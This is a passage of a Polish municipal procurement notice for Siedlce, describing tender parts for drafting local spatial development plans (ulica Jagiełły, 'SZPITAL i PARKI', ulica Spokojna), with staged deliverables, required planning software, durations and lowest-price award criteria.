<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Władysława Jagiełły w Siedlcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie projektu miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Władysława Jagiełły w Siedlcach,  dotyczącego terenu o powierzchni ok.77ha. 
Obszar przedmiotowego planu stanowią zasadniczo  dwa osiedla mieszkaniowe wielorodzinne  1000-lecia I i II etapu. Współtworzą go również tereny usług i częściowo  zabudowy mieszkaniowej jednorodzinnej.  
W granicach obszaru objętego zamówieniem, obowiązuje Zmiana miejscowego planu ogólnego zagospodarowania przestrzennego miasta Siedlce w rejonie ulic: 11-go Listopada, Rynkowej i Jana III Sobieskiego z dnia 28 marca 2002r. uchwalona Uchwałą Rady Miasta Siedlce Nr XLVIII/744/2002  -  stanowiąca obszar ok.  1,5ha

Projekt planu winien być sporządzony z wykorzystaniem  analiz stanu istniejącego oraz uwarunkowań i kierunków zagospodarowania określonych w obowiązującym Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce, zgodnie 
z wymogami obowiązujących przepisów w technologii wektorowej w formacie EWMAPA.
Przedmiotem planu jest ustalenie przeznaczenia terenów, w tym dla inwestycji celu publicznego oraz określenie sposobów ich zagospodarowania i zabudowy, z uwzględnieniem zasad ładu przestrzennego i zrównoważonego zgodnie z art. 15 ust. 2 i 3 ustawy z dnia 
27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717, z póź. zm.).
Zgodnie z ustaleniami Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce dla przedmiotowego obszaru,  przyjęto następujące kierunki  zagospodarowania przestrzennego wyznaczając obszary:
- śródmiejskiej  zabudowy usługowej i  usługowo-mieszkaniowej, 
- terenów mieszkaniowo-usługowych, 
- większych terenów i koncentracji usług z dopuszczeniem zabudowy mieszkaniowej jako funkcji towarzyszącej,
- lokalizacji inwestycji celu publicznego - poszerzanych i nowych ulic wymagających wykupu terenu,   
- terenów parków i skwerów  bez prawa zabudowy,
- ochrony zachowanych elementów zabytkowych.  
- historycznie ukształtowanego układu ulic.   

Realizacja zamówienia będzie składać się z niżej wymienionych części.

1)	Część I - analiza danych wejściowych i przygotowanie koncepcji projektu planu: 
a)	analiza stanu istniejącego i zgodności z ustaleniami Studium polegająca 
w szczególności na analizie istniejących funkcji, parametrów,  cech i wskaźników kształtowania zabudowy oraz zagospodarowania terenu, gabarytów i formy architektonicznej obiektów budowlanych, linii zabudowy, intensywności wykorzystania terenu, dostępności do dróg publicznych, istniejącego lub projektowanego uzbrojenia terenu zabudowy i zagospodarowania w relacji do przyjętych kierunków zagospodarowania przestrzennego w Studium , wykonana na podstawie materiałów geodezyjnych,  inwentaryzacji urbanistycznej, wydanych decyzji o warunkach zabudowy i zagospodarowania terenu,   o pozwoleniu na budowę oraz zezwoleń na realizację inwestycji drogowej -  w formie opisowej i graficznej 
w 2 egz. oraz   w 1egz. w formie numerycznej,
b)	analiza wniosków złożonych do projektu  planu zagospodarowania przestrzennego wraz z propozycją ich uwzględnienia oraz opracowanie uzasadnień  nieuwzględnienia wniosków w 1 egz. oraz w 1 egz. w formie numerycznej,  
c)	opracowanie koncepcji projektu planu w skali 1:2000, uwzględniającej wyniki 
z dokonanej analizy, opracowania ekofizjograficznego oraz zawierającej dla proponowanych jednostek terenowych dane o istniejących  średnich wielkościach powierzchni zabudowy w stosunku do powierzchni działek, średnich wysokościach budynków oraz obiektów, których wysokość wynika z potrzeb technologicznych, średnich szerokościach  elewacji frontowych budynków, występujących najczęściej geometriach dachów, w tym kierunków głównych kalenic dachów w stosunku do frontów działek, kątów  nachylenia połaci dachowych - po 1 egz. i 1 egz. w formie numerycznej, 
2)	Część II - projektowanie:
a)	opracowanie projektu planu, składającego się z projektu uchwały zawierającej część tekstową tj.: ustalenia planu, część graficzną tj.: rysunku   planu w skali 1: 1000 
w 1 egz., przedstawionego na kopii mapy zasadniczej, udostępnionej przez  Zamawiającego,
b)	opracowanie projektu planu w 1 egz. w następującej   formie publikacji  elektronicznej na płycie CD:
- przygotowanie projektu planu w formie publikacji elektronicznej na płycie 
CD w oprogramowaniu EWMAPA firmy GEOBID z Katowic (co najmniej 
wersja 8,00), wymagane uzgodnienie w z Referatem Geodezji struktury danych przed przystąpieniem do opracowania projektu planu,
- zapis treści  uchwały w formie dokumentu co najmniej WORD  2000,
c)	przeprowadzenie analizy, o której mowa w § 7 ust. 2 rozporządzenia Ministra     Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie  (Dz. U. Nr 43, poz.430z póź. zm.) w odniesieniu do sytuacji dopuszczenia mniejszych  szerokości ulic publicznych w liniach rozgraniczających , od określonych w § 7  ust. 1 w/w rozporządzenia - w 2 egz. oraz 1 egz. w formie numerycznej,
3)	Część III - sporządzenie prognozy oddziaływania na środowisko i prognozy skutków finansowych
a)	opracowanie prognozy oddziaływania na środowisko uwzględniającej wymagania zawarte w przepisach ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz 
o ocenach  oddziaływania na środowisko Dz. U. Nr 199, poz. 1227, z póź. zm.), w tym   w szczególności w art. 51 i  art. 52 , oraz uzgodniony z organami właściwymi zakres 
i wymagany stopień szczegółowości informacji, - w 2 egz. oraz w 1 egz. w formie numerycznej, 
b)	sporządzenie prognozy skutków finansowych uchwalenia planu uwzględniającej wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania  przestrzennego (Dz. U. Nr 164, poz. 1587) oraz przepisów o gospodarce  nieruchomościami w odniesieniu do zasad i do osób uprawnionych  do określania tych skutków, zawierającej:
- prognozę wpływu ustaleń planu na dochody własne i wydatki miasta, w tym na:
* wpływy z podatku od nieruchomości,
* inne dochody związane z obrotem nieruchomościami miasta,
* na opłaty i odszkodowania, o których mowa w art. 36 ustawy  o  planowaniu  
i zagospodarowaniu  przestrzennym z wyodrębnieniem poszczególnych  funkcji przeznaczenia terenu,
- prognozę wpływu ustaleń planu na wydatki związane z realizacją inwestycji 
z zakresu infrastruktury technicznej, które należą do zadań własnych miasta, 
- wnioski i zalecenia dotyczące przyjęcia proponowanych rozwiązań projektu    planu,     stawek  procentowych, na podstawie których ustala się opłatę, o której   mowa w art. 36 ust. 4 ustawy o planowaniu i zagospodarowaniu  przestrzennym, wynikające 
z uwzględnienia ich skutków finansowych, w 1 egz. oraz w 1 egz. w formie numerycznej.
4)	Część IV- komisja urbanistyczno-architektoniczna:
a)	przygotowanie pisemnej analizy stanowiska komisji  urbanistyczno - architektonicznej o projekcie planu, zawierającej propozycję rozpatrzenia opinii oraz merytoryczne uzasadnienie nieuwzględnienia uwag,
b)	wprowadzenie do projektu planu, uwzględnionych przez Zamawiającego, korekt wynikających z uzyskanej opinii komisji urbanistyczno-architektonicznej,
c)	przekazanie materiałów, określonych w części IV lit. a) i b) w 1 egz. oraz  w  1egz.  
w formie numerycznej.
5)	Część V- uzgadnianie:
a)	przygotowanie pisemnej analizy opinii i uzgodnień  organów właściwych o projekcie  planu i prognozie oddziaływania na środowisko, zawierającej propozycję  rozpatrzenia  i uwzględnienia poszczególnych uwag w  sporządzanych dokumentach wraz 
z merytorycznym  uzasadnieniem   stanowiska, 
b)	wprowadzenie odpowiednio do projektu planu i prognozy oddziaływania na środowisko uwzględnionych przez Zamawiającego korekt, wynikających 
z uzyskanych opinii   i dokonanych uzgodnień organów,  
c)	przekazanie materiałów w 1 egz. oraz w 1 egz. w formie publikacji elektronicznej  na płycie CD, o których mowa w części V lit. a) i lit. b).  
6)	Część VI - wyłożenie i dyskusja publiczna oraz sposób realizacji infrastruktury technicznej :
a)	uczestniczenie w dyżurze autorskim i dyskusji publicznej w czasie wyłożenia do publicznego wglądu  projektu planu wraz z prognozą oddziaływania na środowisko
b)	opracowanie analizy uwag wniesionych do projektu planu wraz z propozycją ich  uwzględnienia oraz uzasadnieniem nieuwzględnienia pozostałych  z wyodrębnieniem na   wniesione  na podstawie ustawy o planowaniu i zagospodarowaniu oraz ustawy 
o udostępnianiu informacji o środowisku () w 1egz. oraz w 1 egz. w formie numerycznej,
c)	wprowadzenie do projektu planu korekt wynikających z rozpatrzenia uwag, zaakceptowanych przez Zamawiającego,
d)	przekazanie skorygowanego projektu planu Zamawiającemu  w 1 egz. oraz  w 1 egz. w formie publikacji elektronicznej na płycie CD,
e)	wprowadzenie do projektu planu korekt wynikających z ponawianych czynności  
w związku z uwzględnieniem uwag i  przekazywanie  materiałów Zamawiającemu. 
f)	opracowanie sposobów realizacji zapisanych w  planie, inwestycji z zakresu  infrastruktury technicznej, które należą do zadań własnych gminy  oraz zasad ich finansowania, zgodnie z przepisami o finansach publicznych - 1 egz. oraz w 1 egz.  w formie numerycznej. 
7)	Część VII - uchwalenie :
a)	przedstawienie projektu planu miejscowego na posiedzeniu Komisji Gospodarki Przestrzennej i Ochrony Środowiska oraz na Sesji Rady Miasta do uchwalenia wraz z załącznikami, 
b)	przekazanie skorygowanego projektu planu Zamawiającemu w 5 egz. oraz w 1 egz. w formie publikacji elektronicznej na płycie CD, łącznie z listą  nieuwzględnionych uwag oraz określeniem sposobu realizacji, zapisanych w  planie  inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych miasta, oraz zasad ich finansowania, zgodnie z przepisami o finansach publicznych.
c)	opracowanie pisemnego podsumowania i uzasadnienia, o których mowa w art. 42 pkt 2)  i  art. 55 ust. 3 ustawy o udostępnianiu informacji o środowisku (),                          
d)	ewentualne wprowadzenie zmian do projektu planu wniesionych przez Radę Miasta 
i udział w czynnościach ponowionej, w niezbędnym zakresie, procedury planistycznej,
e)	udział w czynnościach niezbędnych do ewentualnego doprowadzenia planu 
do zgodności z przepisami prawnymi, w sytuacji stwierdzenia nieważności uchwały
w  sprawie  planu, w tym udział w postępowaniu przed sądami administracyjnymi,
f)	udzielanie ewentualnych wyjaśnień Wojewodzie, któremu została przedstawiona  uchwała o uchwaleniu planu miejscowego wraz z załącznikami, do ich oceny pod względem zgodności  z przepisami prawa,
g)	przygotowanie uchwały w formacie Edytora Aktów Prawnych  XML do publikacji 
w Dzienniku Urzędowym Województwa Mazowieckiego,
h)	przygotowanie części opisowej planu w oprogramowaniu WINPLAN firmy GEOBID z Katowic (co  najmniej wersja 8,00).

Przy realizacji zamówienia na sporządzenie  miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Władysława Jagiełły w Siedlcach  konieczne jest zastosowania co najmniej wersji 8,0 oprogramowania WINPLAN i EWMAPA firmy  Geobid z Katowic  oraz edytora tekstu co najmniej Word 2000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego pn. SZPITAL i PARKI w Siedlcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie projektu miejscowego planu zagospodarowania przestrzennego pn. SZPITAL i PARKI w Siedlcach, dotyczącego terenu o powierzchni ok. 74ha. 
Terenem opracowania objęto obszar pełniący funkcje mieszkaniowo-usługowe 
i usługowe o zasięgu regionalnym (ośrodek sportowy, szpital). W obszarze objętym 
do opracowania miejscowego planu znajdują się obiekty i obszary wpisane do rejestru zabytków, obiekty zainteresowania konserwatorskiego oraz obiekty i obszary przyrodnicze chronione prawem,  które ustaleniami przyszłego planu będą chronione. Ponadto część terenu objętego planem to parki i skwery. Na wskazanym terenie do sporządzenia dokumentu planistycznego znajduje się także Okręgowa Spółdzielnia Mleczarska.
Projekt planu winien być sporządzony z wykorzystaniem analiz stanu istniejącego oraz uwarunkowań i kierunków zagospodarowania określonych w obowiązującym Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce, zgodnie 
z wymogami obowiązujących przepisów w technologii wektorowej w formacie EWMAPA.
Przedmiotem planu jest  ustalenie przeznaczenia terenów, w tym dla inwestycji celu publicznego oraz określenie sposobów ich zagospodarowania i zabudowy, z uwzględnieniem zasad ładu przestrzennego i zrównoważonego zgodnie  z art. 15 ust. 2 i 3 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717, z póź. zm.).
Zgodnie z ustaleniami Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce dla przedmiotowego obszaru,  przyjęto następujące kierunki  zagospodarowania przestrzennego wyznaczając:
- tereny  mieszkaniowo-usługowe,
- większe tereny i koncentracje usług,
- obszary parków i skwerów,  które  w zasadniczej części  są objęte obszarem wyłączonym spod zabudowy,
- tereny rekreacyjno-sportowe, 
- tereny produkcyjno-usługowe i techniczne. 
Postanowienia studium zakładają również rozbudowę układu drogowego ulic lokalnych.

Realizacja zamówienia będzie składać się z niżej wymienionych części.

1)	Część I - analiza danych wejściowych i przygotowanie koncepcji projektu planu: 
a)	analiza stanu istniejącego i zgodności z ustaleniami Studium  polegająca w szczególności na analizie istniejących funkcji, parametrów,  cech i wskaźników kształtowania   zabudowy oraz zagospodarowania terenu, gabarytów i formy architektonicznej  obiektów budowlanych, linii zabudowy, intensywności wykorzystania terenu, dostępności do dróg publicznych, istniejącego lub projektowanego uzbrojenia terenu zabudowy i zagospodarowania w relacji do przyjętych kierunków zagospodarowania przestrzennego w Studium , wykonana na podstawie materiałów geodezyjnych,  inwentaryzacji urbanistycznej, wydanych decyzji o warunkach zabudowy i zagospodarowania terenu,   o pozwoleniu na budowę oraz zezwoleń na realizację inwestycji drogowej -  w formie opisowej i graficznej w 2 egz. oraz   w 1egz. w formie numerycznej,
b)	analiza wniosków złożonych do projektu  planu zagospodarowania przestrzennego wraz z propozycją ich uwzględnienia oraz opracowanie uzasadnień  nieuwzględnienia wniosków w 1 egz. oraz w 1 egz. w formie numerycznej,  
c)	opracowanie koncepcji projektu planu w skali 1 : 2000, uwzględniającej wyniki 
z dokonanej analizy, opracowania ekofizjograficznego oraz zawierającej dla proponowanych jednostek terenowych dane o istniejących  średnich wielkościach powierzchni zabudowy w stosunku do powierzchni działek, średnich wysokościach budynków oraz obiektów, których wysokość wynika z potrzeb technologicznych, średnich szerokościach  elewacji frontowych budynków, występujących najczęściej geometriach dachów, w tym kierunków głównych kalenic dachów w stosunku do frontów działek, kątów  nachylenia połaci dachowych  - po 1 egz. i 1 egz. w formie numerycznej, 
2)	Część II - projektowanie:
a)	opracowanie projektu planu, składającego się z projektu uchwały zawierającej część tekstową tj.: ustalenia planu, część graficzną tj.: rysunku   planu w skali 1: 1000 
w 1 egz., przedstawionego na kopii mapy zasadniczej, udostępnionej przez  Zamawiającego,
b)	opracowanie projektu planu w 1 egz. w następującej   formie publikacji  elektronicznej na płycie CD:
- przygotowanie projektu planu w formie publikacji elektronicznej na płycie CD w oprogramowaniu EWMAPA firmy GEOBID z Katowic (co  najmniej wersja 8,00), wymagane uzgodnienie w z Referatem Geodezji struktury danych przed przystąpieniem do opracowania projektu planu,
- zapis treści  uchwały w formie dokumentu co najmniej WORD  2000,
c)	przeprowadzenie analizy, o której mowa w § 7 ust. 2 rozporządzenia Ministra     Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie  (Dz. U. Nr 43, poz.430z póź. zm.) w odniesieniu do sytuacji dopuszczenia mniejszych  szerokości ulic publicznych w liniach rozgraniczających , od określonych w § 7  ust. 1 w/w rozporządzenia  - w 2 egz. oraz 1 egz. w formie numerycznej,
3)	Część III - sporządzenie prognozy oddziaływania na środowisko i prognozy skutków finansowych
a)	opracowanie prognozy oddziaływania na środowisko uwzględniającej wymagania    
zawarte w przepisach ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz 
o ocenach  oddziaływania na środowisko Dz. U. Nr 199, poz. 1227, z póź. zm.), w tym   w szczególności w art. 51 i  art. 52 , oraz uzgodniony z organami właściwymi zakres 
i wymagany stopień szczegółowości informacji - w 2 egz. oraz w 1 egz.  w formie numerycznej, 
b) sporządzenie prognozy skutków finansowych uchwalenia planu  uwzględniającej wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. 
w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania  przestrzennego (Dz. U. Nr 164, poz. 1587) oraz przepisów o gospodarce  nieruchomościami w odniesieniu do zasad i do osób uprawnionych do określania tych skutków, zawierającej:
- prognozę wpływu ustaleń planu na dochody własne i wydatki miasta, w tym na:
* wpływy z podatku od nieruchomości,
* inne dochody związane z obrotem nieruchomościami miasta,
* na opłaty i odszkodowania, o których mowa w art. 36 ustawy  o  planowaniu 
i zagospodarowaniu  przestrzennym z wyodrębnieniem poszczególnych  funkcji przeznaczenia terenu,
- prognozę wpływu ustaleń planu na wydatki związane z realizacją inwestycji 
z zakresu infrastruktury technicznej, które należą do zadań własnych miasta,  
- wnioski i zalecenia dotyczące przyjęcia proponowanych rozwiązań projektu  planu,   w tym stawek  procentowych, na podstawie których ustala się opłatę, o której   mowa w art. 36 ust. 4 ustawy o planowaniu i zagospodarowaniu przestrzennym, wynikające z uwzględnienia ich skutków finansowych,
 - w 1 egz. oraz w 1 egz. w formie numerycznej.
4)	Część IV- komisja urbanistyczno-architektoniczna:
a)	przygotowanie pisemnej analizy stanowiska komisji urbanistyczno - architektonicznej o projekcie planu, zawierającej propozycję rozpatrzenia opinii oraz merytoryczne uzasadnienie nieuwzględnienia uwag,
b)	wprowadzenie do projektu planu, uwzględnionych przez Zamawiającego, korekt wynikających z uzyskanej opinii komisji urbanistyczno-architektonicznej,
c)	przekazanie materiałów, określonych w części IV  lit. a) i b) w 1 egz. oraz w  1egz.  w formie numerycznej.
5)	Część V- uzgadnianie:
a)	przygotowanie pisemnej analizy opinii i uzgodnień organów właściwych o projekcie  planu i prognozie oddziaływania na środowisko, zawierającej propozycję rozpatrzenia i uwzględnienia poszczególnych uwag w sporządzanych dokumentach wraz 
z merytorycznym  uzasadnieniem   stanowiska, 
b)	wprowadzenie odpowiednio do projektu planu i prognozy oddziaływania na środowisko uwzględnionych przez Zamawiającego korekt, wynikających z uzyskanych opinii i dokonanych uzgodnień organów,  
c)	przekazanie materiałów w 1 egz. oraz w 1 egz. w formie publikacji elektronicznej                  na płycie CD, o których mowa w części V lit. a) i lit. b).  
6)	Część VI - wyłożenie i dyskusja publiczna oraz sposób realizacji infrastruktury technicznej:
1)	uczestniczenie w dyżurze autorskim i dyskusji publicznej w czasie wyłożenia do publicznego wglądu  projektu planu wraz z prognozą oddziaływania na środowisko
2)	opracowanie analizy uwag wniesionych do projektu planu wraz z propozycją ich  uwzględnienia oraz uzasadnieniem nieuwzględnienia pozostałych  z wyodrębnieniem na wniesione na podstawie ustawy o planowaniu i zagospodarowaniu oraz ustawy 
o udostępnianiu informacji o środowisku () w 1egz. oraz w 1 egz. w formie numerycznej,                                                         
c) wprowadzenie do projektu planu korekt wynikających z rozpatrzenia uwag, zaakceptowanych przez Zamawiającego,                            
d)   przekazanie skorygowanego projektu planu Zamawiającemu w 1 egz. oraz  w 1 egz. 
w formie publikacji elektronicznej na płycie CD,
e)  wprowadzenie do projektu planu korekt wynikających z ponawianych czynności w związku z uwzględnieniem uwag i  przekazywanie  materiałów Zamawiającemu. 
f)    opracowanie sposobów realizacji zapisanych w  planie, inwestycji
       z zakresu  infrastruktury technicznej, które należą do zadań własnych gminy oraz zasad  ich finansowania, zgodnie z przepisami o finansach publicznych -1 egz. oraz 
w 1 egz.  w formie numerycznej. 
7)	Część VII - uchwalenie :
a)	przedstawienie projektu planu miejscowego na posiedzeniu Komisji Gospodarki Przestrzennej i Ochrony Środowiska oraz na Sesji Rady Miasta do uchwalenia wraz z załącznikami, 
b)	przekazanie skorygowanego projektu planu Zamawiającemu w 5 egz. oraz  w 1 egz. 
w formie publikacji elektronicznej na płycie CD, łącznie z listą  nieuwzględnionych uwag oraz określeniem sposobu realizacji, zapisanych w  planie  inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych miasta, oraz zasad ich finansowania, zgodnie z przepisami o finansach publicznych.
c)	opracowanie pisemnego podsumowania i uzasadnienia, o których mowa w art. 42 
pkt 2)  i  art. 55 ust. 3 ustawy o udostępnianiu informacji o środowisku (),                          
d)	ewentualne wprowadzenie zmian do projektu planu wniesionych przez Radę Miasta 
i udział w czynnościach ponowionej, w niezbędnym zakresie, procedury planistycznej,
e)	udział w czynnościach niezbędnych do ewentualnego doprowadzenia planu do zgodności z przepisami prawnymi, w sytuacji stwierdzenia nieważności uchwały 
w  sprawie  planu, w tym udział w postępowaniu przed sądami administracyjnymi,
f)	udzielanie ewentualnych wyjaśnień Wojewodzie, któremu została przedstawiona  uchwała o uchwaleniu planu miejscowego wraz z załącznikami, do ich oceny pod względem zgodności  z przepisami prawa,
g)	przygotowanie uchwały w formacie Edytora Aktów Prawnych  XML do publikacji 
w Dzienniku Urzędowym Województwa Mazowieckiego,
h)	przygotowanie części opisowej planu w oprogramowaniu WINPLAN firmy GEOBID z Katowic (co  najmniej wersja 8,00).

Przy realizacji zamówienia na sporządzenie miejscowego planu zagospodarowania przestrzennego pn. SZPITAL i PARKI w Siedlcach konieczne jest zastosowania co  najmniej wersji 8,0 oprogramowania WINPLAN i EWMAPA firmy  Geobid z Katowic  oraz edytora tekstu co najmniej Word 2000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Spokojnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie, zgodnie z obowiązującymi przepisami prawa,  miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Spokojnej 
w granicach określonych uchwałą Rady Miasta Siedlce Nr X/189/2011  z dnia 28 czerwca 2011r. o przystąpieniu do sporządzenia miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Spokojnej, zgodnie ze Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce, Strategią Rozwoju Miasta Siedlce do 2020 r., oraz z wykorzystaniem analiz stanu istniejącego.  Przedmiotem planu będzie ustalenie przeznaczenia terenów, rozmieszczenie inwestycji celu publicznego oraz określenie sposobów i warunków zabudowy terenów dotyczącej terenu zawartego pomiędzy  ulicami: Warszawska, Józefa Piłsudskiego, Sportową, Katedralną, Wojskową, Cmentarna, Piaskową, Prezydenta Ryszarda Kaczorowskiego oraz terenem PKP o  zasięgu terytorialnym  obejmującym  powierzchnię wynoszącą około 76 ha.
Opracowanie przedmiotowego dokumentu planistycznego powinno nastąpić w oparciu o regulacje ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym  
(Dz. U. z 2003 r.  Nr 80, poz. 717,  z późn. zm.) oraz rozporządzenia Ministra Infrastruktury 
z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego  (Dz. U. 164, poz. 1587). 

Realizacja zamówienia będzie składać się z niżej wymienionych części.

1)	Część I - analiza danych wejściowych i przygotowanie koncepcji projektu planu  - 
a)	analiza stanu istniejącego i zgodności z ustaleniami Studium  polegająca w szczególności na analizie istniejących funkcji, parametrów,  cech i wskaźników kształtowania zabudowy oraz zagospodarowania terenu, gabarytów i formy architektonicznej obiektów budowlanych, linii zabudowy, intensywności wykorzystania terenu, usytuowania tablic i urządzeń reklamowych w rejonie dróg zbiorczych i lokalnych, dostępności  do dróg publicznych, istniejącego lub projektowanego uzbrojenia terenu zabudowy i zagospodarowania w relacji do przyjętych kierunków zagospodarowania przestrzennego w Studium, wykonana na podstawie materiałów geodezyjnych,  inwentaryzacji urbanistycznej, wydanych decyzji o warunkach zabudowy i zagospodarowania terenu, o pozwoleniu  na budowę oraz zezwoleń na realizację inwestycji drogowej - w formie opisowej i graficznej w 2 egz. oraz w 1egz. w formie numerycznej,
b)	analiza wniosków złożonych do projektu  planu zagospodarowania przestrzennego   wraz z propozycją ich uwzględnienia oraz opracowanie uzasadnień  nieuwzględnienia wniosków w 1 egz. oraz w 1 egz. w formie numerycznej,  
c)	opracowanie koncepcji projektu planu zawierającej co najmniej dwa warianty rozwiązań alternatywnych w skali 1:2000, uwzględniającej wyniki z dokonanej analizy, opracowania ekofizjograficznego oraz zawierającej dla proponowanych jednostek terenowych dane o istniejących  średnich wielkościach powierzchni zabudowy w stosunku do powierzchni działek, średnich wysokościach budynków oraz obiektów, których wysokość wynika z potrzeb technologicznych, średnich szerokościach elewacji frontowych budynków, występujących najczęściej geometriach dachów, w tym kierunków głównych kalenic dachów w stosunku do frontów działek, kątów  nachylenia połaci dachowych  - po 1 egz. i 1 egz.  w formie numerycznej, 
2) Część II - projektowanie:
a)  opracowanie projektu planu, składającego się z projektu uchwały zawierającej część tekstową, tj.: ustalenia planu, część graficzną tj.: rysunek planu w skali 1: 1000, przedstawioną na  kopii mapy zasadniczej,  udostępnionej  przez  Zamawiającego -  w 1 egz.,
b) 	opracowanie projektu planu w 1 egz. w następującej formie publikacji elektronicznej na płycie CD:
- przygotowanie projektu planu w formie publikacji elektronicznej na płycie CD 
w oprogramowaniu  EWMAPA firmy GEOBID z Katowic (co  najmniej wersja 8,00), wymagane uzgodnienie w z Referatem Geodezji struktury danych przed przystąpieniem do opracowania projektu planu,
-  zapis treści  uchwały w formie dokumentu co najmniej WORD  2000,
c) 	przeprowadzenie analizy, o której mowa w § 7 ust. 2 rozporządzenia Ministra  Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków  technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43, poz.430, z póź. zm.)  w odniesieniu do sytuacji dopuszczenia  mniejszych szerokości ulic publicznych w liniach rozgraniczających, od określonych w § 7  ust. 1 w/w rozporządzenia  - w 2 egz. oraz 1 egz. w formie numerycznej,
3) Część III - sporządzenie prognozy oddziaływania na środowisko i prognozy skutków finansowych
a)	opracowanie prognozy oddziaływania na środowisko,  uwzględniającej wymagania   zawarte w przepisach ustawy z dnia 3 października 2008 r. o udostępnianiu  informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach  oddziaływania na środowisko Dz. U. Nr 199, poz. 1227,  z póź. zm.), 
w tym w szczególności w art. 51 i  art. 52, oraz uzgodniony z organami właściwymi zakres i wymagany stopień szczegółowości informacji,  
- w 2 egz. oraz w 1 egz.  w formie numerycznej, 
b) 	sporządzenie prognozy skutków finansowych uchwalenia planu uwzględniającej wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania  przestrzennego (Dz. U. Nr 164, poz. 1587) oraz przepisów o gospodarce  nieruchomościami w odniesieniu do zasad i do osób uprawnionych do określania tych skutków, zawierającej:
            - prognozę wpływu ustaleń planu na dochody własne i wydatki miasta, w tym na:
- wpływy z podatku od nieruchomości,
- inne dochody związane z obrotem nieruchomościami miasta,
- na opłaty i odszkodowania, o których mowa w art. 36 ustawy  o  planowaniu 
i zagospodarowaniu  przestrzennym z wyodrębnieniem poszczególnych  funkcji przeznaczenia terenu,
- prognozę wpływu ustaleń planu na wydatki związane z realizacją inwestycji 
z zakresu infrastruktury technicznej, które należą do zadań własnych miasta,  
- wnioski i zalecenia dotyczące przyjęcia proponowanych rozwiązań projektu  planu, w tym stawek  procentowych, na podstawie których ustala się opłatę, o której mowa 
w art. 36 ust. 4 ustawy o planowaniu i zagospodarowaniu przestrzennym, wynikające z uwzględnienia ich skutków finansowych, 
- w 1 egz. oraz w 1 egz. w formie numerycznej.
4) Część IV- komisja urbanistyczno-architektoniczna:
a)	przygotowanie pisemnej analizy stanowiska komisji urbanistyczno - architektonicznej o projekcie planu, zawierającej propozycję rozpatrzenia opinii oraz merytoryczne uzasadnienie nieuwzględnienia uwag,
b)	wprowadzenie do projektu planu, uwzględnionych przez Zamawiającego, korekt wynikających z uzyskanej opinii komisji urbanistyczno-architektonicznej,
c)	przekazanie Zamawiającemu materiałów, określonych w części IV lit. a) i b) w 1 egz. oraz  w  1egz.  w formie numerycznej.
5) Część V- uzgadnianie:
a)	przygotowanie pisemnej analizy opinii i uzgodnień  organów właściwych o projekcie  planu i prognozie  oddziaływania na środowisko, zawierającej propozycję  rozpatrzenia i uwzględnienia poszczególnych uwag w sporządzanych dokumentach wraz z merytorycznym  uzasadnieniem   stanowiska, 
